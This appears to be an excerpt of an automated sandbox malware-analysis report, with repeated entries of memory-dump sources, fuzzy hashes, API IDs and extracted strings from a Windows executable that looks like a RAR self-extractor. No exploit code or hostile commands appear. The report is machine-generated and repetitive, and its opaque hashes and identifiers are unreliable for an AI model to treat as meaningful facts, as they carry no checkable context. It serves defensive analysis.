                                                                                                                                            • Opcode Fuzzy Hash: 5852029dbc0ce463896b4f8196b6243869ef963d9e7f9ccb60a74bfb739e6291
                                                                                                                                            • Instruction Fuzzy Hash: D4F0D463F2C10783FF68D028981933913499BA8314F66C83AD09ACE2C5DC5FA9B1310F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a0c1b5387afa24fdc5f2f2df594e0a2e6bc3351a6963a1bbc3c85c0b3800b28c
                                                                                                                                            • Instruction ID: e8cd7947c2dd4e4690d02d5a02f60e7bd745c55ab731c0e726f25011b30a4553
                                                                                                                                            • Opcode Fuzzy Hash: a0c1b5387afa24fdc5f2f2df594e0a2e6bc3351a6963a1bbc3c85c0b3800b28c
                                                                                                                                            • Instruction Fuzzy Hash: 09A00123918806DBEA449B00A8506202328BBA0300BD00131E01EC50A0AE2EA510E70B
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wcscat$Global$AllocByteCharCreateMultiStreamWidewcscpy
                                                                                                                                            • String ID: $</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                            • API String ID: 3314394749-1507786326
                                                                                                                                            • Opcode ID: 52b965630d59adb05454bcad9a7b334c9918c3c9847670556ddf0182290c5d9f
                                                                                                                                            • Instruction ID: 69bec57a0a74a78a667abbee2bce152f59ffc25832469f295566f200eeea7ee7
                                                                                                                                            • Opcode Fuzzy Hash: 52b965630d59adb05454bcad9a7b334c9918c3c9847670556ddf0182290c5d9f
                                                                                                                                            • Instruction Fuzzy Hash: EE41A463A08B4283EF14EB26A9543796369AF84BC0F444131DE4D8B7A6DF3EE505D70A
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                            • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                            • API String ID: 3215553584-2617248754
                                                                                                                                            • Opcode ID: 830a02f2d1ce28f0f26177b07792ed9f188223e13c7520931e8b97b82f32b3d6
                                                                                                                                            • Instruction ID: d684d33623443dff6c549ec60688d378ed40eea2515b6dff51ad07ed6465da4c
                                                                                                                                            • Opcode Fuzzy Hash: 830a02f2d1ce28f0f26177b07792ed9f188223e13c7520931e8b97b82f32b3d6
                                                                                                                                            • Instruction Fuzzy Hash: D441DD33A09B459BEB44CF21E8417A933A8EB44398F204136EE4C87B99DE3ED125D349
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ItemTextWindow
                                                                                                                                            • String ID: LICENSEDLG
                                                                                                                                            • API String ID: 2478532303-2177901306
                                                                                                                                            • Opcode ID: 17dfc627028cba28be5a2bf4ffb6ce9a1a66f36b6f2080bc31abf3f60b7aedf5
                                                                                                                                            • Instruction ID: 99970969530b08f62fef2ba8920d5ee39d3c67002b15cd789f6c8460e10cafd4
                                                                                                                                            • Opcode Fuzzy Hash: 17dfc627028cba28be5a2bf4ffb6ce9a1a66f36b6f2080bc31abf3f60b7aedf5
                                                                                                                                            • Instruction Fuzzy Hash: B7417C6BA0C64283FB50AB12BC5037823A5AF89F81F144135DA0DC7BA5CF3FA556970A
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                                                                                                                            • String ID: STATIC
                                                                                                                                            • API String ID: 2845197485-1882779555
                                                                                                                                            • Opcode ID: 7ac47d7ed1b220d745810030047bda2d9fbd8d42c9736def71ff58465e4c96f3
                                                                                                                                            • Instruction ID: f39a83f6de5d38a8efd799ea9f8bd51a14a0eafe3a2095187335ab1054f90b51
                                                                                                                                            • Opcode Fuzzy Hash: 7ac47d7ed1b220d745810030047bda2d9fbd8d42c9736def71ff58465e4c96f3
                                                                                                                                            • Instruction Fuzzy Hash: 4C31A127B0D68247FE60AB12A9507B92395AB89BC4F204031DD4D8774ADF3FE9029B06
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Time$System$File$Format$DateLocalSpecificswprintf
                                                                                                                                            • String ID: %s %s$2
                                                                                                                                            • API String ID: 1692029381-3036323853
                                                                                                                                            • Opcode ID: ede5e6b769960d0b1a275bfac8d84711a033dd5369ce5698a12840544c12596f
                                                                                                                                            • Instruction ID: 4f71f19abc348206126d90e7cec8fba1905f7df955407f550b3aeef2d3b85fdd
                                                                                                                                            • Opcode Fuzzy Hash: ede5e6b769960d0b1a275bfac8d84711a033dd5369ce5698a12840544c12596f
                                                                                                                                            • Instruction Fuzzy Hash: FB21A973A08A4597EB109F65F8007DA73A5FF88798F401032EA4D57A68DF3DD149CB04
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                            • API String ID: 2915667086-2207617598
                                                                                                                                            • Opcode ID: 3b073771c7bcd138a86693d0fe2c0e03bdb42b3ae7d59337cbbdfc84a2f6350c
                                                                                                                                            • Instruction ID: e381ad4f73715deeb83705bf088b3946fe7a97ff696c5d8c94d2ec05cf354b0a
                                                                                                                                            • Opcode Fuzzy Hash: 3b073771c7bcd138a86693d0fe2c0e03bdb42b3ae7d59337cbbdfc84a2f6350c
                                                                                                                                            • Instruction Fuzzy Hash: CB316F27B0A70383FE54CB15A8413742369AF44B94F440135E84E8B3A4EF7FE556E30A
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                            • API String ID: 2940173790-393685449
                                                                                                                                            • Opcode ID: a5bd8a248080d43b613735530291df55df3c9da5d07db07e5248e4fa39f42a24
                                                                                                                                            • Instruction ID: 95a5dd88ea2a4e87c0709111cfbd24d740672fc9e28e123ff57cc23ee416a35a
                                                                                                                                            • Opcode Fuzzy Hash: a5bd8a248080d43b613735530291df55df3c9da5d07db07e5248e4fa39f42a24
                                                                                                                                            • Instruction Fuzzy Hash: 83E193739086828BE720AF34D4803BD3BA8EB54748F244135DE4D87796DF3AE581EB46
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClearVariant
                                                                                                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                                            • API String ID: 1473721057-3505469590
                                                                                                                                            • Opcode ID: 109e0eb20b2feaddf5308beb1d30b3f2d6e9e237cd0707f6e0f8bfdb3fec98d4
                                                                                                                                            • Instruction ID: a37fdc2b43ba2345537139af55ab89a2c559347648026808738f084fa5b8902a
                                                                                                                                            • Opcode Fuzzy Hash: 109e0eb20b2feaddf5308beb1d30b3f2d6e9e237cd0707f6e0f8bfdb3fec98d4
                                                                                                                                            • Instruction Fuzzy Hash: 25715E37A18B0687EB10DF25E8806AD7778FB94B88B005532EA4E83B68DF3ED544D705
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileMoveNamePath$CompareLongShortStringswprintf
                                                                                                                                            • String ID: rtmp%d
                                                                                                                                            • API String ID: 2308737092-3303766350
                                                                                                                                            • Opcode ID: c0275ade39ceb1d8056d394355d336ad814de7b7ade98d997f472c92bd8ab29b
                                                                                                                                            • Instruction ID: bfa641e6342f2f907ab6abcb27b51bf73078c23d762e96395a44b5348938d864
                                                                                                                                            • Opcode Fuzzy Hash: c0275ade39ceb1d8056d394355d336ad814de7b7ade98d997f472c92bd8ab29b
                                                                                                                                            • Instruction Fuzzy Hash: C5514623A1C58647DA30AF21D8503FD2368BF45B84F811432E94DDB69EDE2EE706E346
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Show$RectText
                                                                                                                                            • String ID: RarHtmlClassName
                                                                                                                                            • API String ID: 3937224194-1658105358
                                                                                                                                            • Opcode ID: b91dfe9626c691e5521310d2b7ca57a7b03ad7aa33bf76d6300ffe2a0bfd6312
                                                                                                                                            • Instruction ID: 4f5b811daa4e88c3b355744292489d3d238b502405472d8d39fc5fdc485423c3
                                                                                                                                            • Opcode Fuzzy Hash: b91dfe9626c691e5521310d2b7ca57a7b03ad7aa33bf76d6300ffe2a0bfd6312
                                                                                                                                            • Instruction Fuzzy Hash: 9D519367A0978287EE649F12B45033A63A4FF88B80F544435DE8E87B58CF3FE0558B05
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(?,?,?,00007FF6EF6D5E47,?,?,?,00007FF6EF6D61FA), ref: 00007FF6EF6D5EFF
                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6EF6D5E47,?,?,?,00007FF6EF6D61FA), ref: 00007FF6EF6D5F1C
                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6EF6D5E47,?,?,?,00007FF6EF6D61FA), ref: 00007FF6EF6D5F38
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                            • API String ID: 667068680-1718035505
                                                                                                                                            • Opcode ID: a285e220308e788f2ab36963cfab2be891698921037f4134e9d32917d0b7cf85
                                                                                                                                            • Instruction ID: 69cf9f31d1415f7683f437d8329ead0e64217ea4eb5f152110fdc0103404fe56
                                                                                                                                            • Opcode Fuzzy Hash: a285e220308e788f2ab36963cfab2be891698921037f4134e9d32917d0b7cf85
                                                                                                                                            • Instruction Fuzzy Hash: D1118E27A09B0383FE509B00A94037413996F18788F6C0434C85DCB750EEBFF890AB0A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2092733347-0
                                                                                                                                            • Opcode ID: 1ba7e9eeb29331dbf72bee44956e7281ce906d28814823c0f1390a1f09b24211
                                                                                                                                            • Instruction ID: c4f700b9b2cd64a8ea8beb164dc3f4f76f5509df0d3635ca62f4f8966270d678
                                                                                                                                            • Opcode Fuzzy Hash: 1ba7e9eeb29331dbf72bee44956e7281ce906d28814823c0f1390a1f09b24211
                                                                                                                                            • Instruction Fuzzy Hash: 86517BB3B106518BEB14CFA8D8441AC37B5F748788B60403ADE4EABB58DF39E945C704
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2092733347-0
                                                                                                                                            • Opcode ID: 720de4bf0058d3d5f955e2258e2d7ea23c03fb14de544732891b4eab8a87f0bb
                                                                                                                                            • Instruction ID: 55873749a7a0ddf145a2411a95c877fafd710d039c8637197e3ce8fcdeb42b78
                                                                                                                                            • Opcode Fuzzy Hash: 720de4bf0058d3d5f955e2258e2d7ea23c03fb14de544732891b4eab8a87f0bb
                                                                                                                                            • Instruction Fuzzy Hash: 2E315B63B106528EFB00CFB5D8902AC3374FF08758B54502AEE4EA7A58EF38D595D705
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
